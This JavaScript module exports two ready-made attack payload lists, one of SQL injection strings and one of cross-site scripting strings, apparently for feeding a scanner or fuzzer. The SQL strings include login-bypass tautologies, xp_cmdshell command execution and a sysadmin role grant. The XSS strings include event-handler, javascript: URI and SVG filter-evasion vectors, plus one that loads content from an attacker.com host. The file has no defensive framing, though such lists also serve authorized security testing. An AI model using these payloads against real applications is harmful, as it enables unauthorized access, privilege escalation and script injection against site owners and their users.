const sqlPayloads = [
    "' OR '1'='1",
    "' OR '1'='1' -- ",
    "' OR 1=1 -- ",
    "' OR '1'='1' ({",
    "' OR 1=1#",
    "' OR '1'='1' /*",
    "' OR '1'='1' -- -",
    "' OR 1=1; --",
    "' OR 1=1;#",
    "' OR 'a'='a",
    "' OR 'a'='a' --",
    "' OR 'a'='a' /*",
    "' OR 'a'='a' #",
    "' OR ''='",
    "' OR '1'='1' /*",
    "' OR '1'='1'--",
    "' OR '1'='1'({",
    "' OR 1=1--",
    "' OR '1'='1' /*",
    "' OR 1=1#",
    "' OR 1=1; --",
    "' OR 1=1;#",
    "' OR 1=1;/*",
    "admin' --",
    "admin' #",
    "admin'/*",
    "admin' or '1'='1",
    "admin' or '1'='1'--",
    "admin' or '1'='1'#",
    "admin' or '1'='1'/*",
    "admin' or 1=1",
    "admin' or 1=1--",
    "admin' or 1=1#",
    "admin' or 1=1/*",
    "' or '1'='1'--",
    "' or '1'='1'#",
    "' or '1'='1'/*",
    "' or 1=1--",
    "' or 1=1#",
    "' or 1=1/*",
    "' or 1=1;--",
    "' or 1=1;#",
    "' or 1=1;/*",
    "'; EXEC xp_cmdshell('ping 127.0.0.1')--",
    "'; EXEC xp_cmdshell('ping 127.0.0.1')#",
    "'; EXEC xp_cmdshell('ping 127.0.0.1')/*",
    "'; EXEC sp_addsrvrolemember 'sa', 'sysadmin'--",
    "'; EXEC sp_addsrvrolemember 'sa', 'sysadmin'#",
    "'; EXEC sp_addsrvrolemember 'sa', 'sysadmin'/*",
    "' OR 1=1 -- -",
    "' OR '1'='1' -- -",
    "' OR '1'='1' -- -",
];

const xssPayloads = [
    "<script>alert('XSS')</script>",
    "<img src=x onerror=alert('XSS')>",
    "<svg onload=alert('XSS')>",
    "<body onload=alert('XSS')>",
    "<iframe src=javascript:alert('XSS')>",
    "<input type=image src=javascript:alert('XSS')>",
    "\" onmouseover=\"alert('XSS')",
    "' onmouseover='alert('XSS')",
    "<a href=javascript:alert('XSS')>Click me</a>",
    "<div onmouseover=alert('XSS')>Hover over me</div>",
    "<img src=x onerror=alert('XSS')//>",
    "<img src=x onerror=alert('XSS')>",
    "<img src=x:alert(1) onerror=eval(src)>",
    "<link rel=stylesheet href=data:text/css,<style>*{background:url(https://attacker.com/xss.gif)}</style>",
    "<object data=data:text/html,<script>alert('XSS')</script>>",
    "<embed src=data:text/html,<script>alert('XSS')</script>>",
    "<details open ontoggle=alert(1)>",
    "<svg><script>alert(1)</script>",
    "<marquee onstart=alert(1)>",
    "<keygen onfocus=alert(1)>",
    "<audio src onloadstart=alert(1)>",
    "<video><source onerror=\"javascript:alert(1)\">",
    "<select autofocus onfocus=alert(1)>",
    "<textarea autofocus onfocus=alert(1)>",
    "<math href=\"javascript:alert(1)\">CLICKME</math>",
    "<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></desc>",
    "<svg><foreignObject><![CDATA[</foreignObject><script>alert(1)</script>]]></foreignObject>",
    "<meta http-equiv=\"refresh\" content=\"0;url=javascript:alert(1)\">",
    "<svg/onload=alert(1)>",
    "<div onpointerover=alert(1)>",
    "<div onwheel=alert(1)>",
    "<input onfocus=alert(1)>",
    "<div ontouchstart=alert(1)>",
    "<svg><a xlink:href=\"javascript:alert(1)\">X</a></svg>",
    "<svg><feImage href=\"javascript:alert(1)\"></svg>",
    "<svg><set attributeName=href to=\"javascript:alert(1)\"></set></svg>",
    "<svg><animate attributeName=href to=\"javascript:alert(1)\"></animate></svg>",
    "<div style=\"animation: xss infinite 1s; @keyframes xss { 0% { content: url(javascript:alert(1)); } }\">",
];

module.exports={
    sqlPayloads,
    xssPayloads
}